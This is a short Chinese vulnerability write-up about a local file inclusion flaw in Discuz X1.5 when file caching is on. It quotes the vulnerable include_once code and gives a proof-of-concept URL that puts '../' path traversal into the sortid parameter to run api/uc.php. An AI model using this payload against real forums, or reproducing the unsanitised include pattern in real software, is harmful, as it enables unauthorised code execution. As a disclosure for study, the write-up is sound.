DISCUZ X1.5 本地文件包含漏洞_漏洞分析教程-查字典教程网
DISCUZ X1.5 本地文件包含漏洞
DISCUZ X1.5 本地文件包含漏洞
发布时间:2016-12-21 来源:查字典编辑
摘要:DISCUZX1.5本地文件包含,当然是有条件的,就是使用文件作为缓存。config_global.php$_config['cache']...

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞分析学习
    热门漏洞分析学习
    网络安全子分类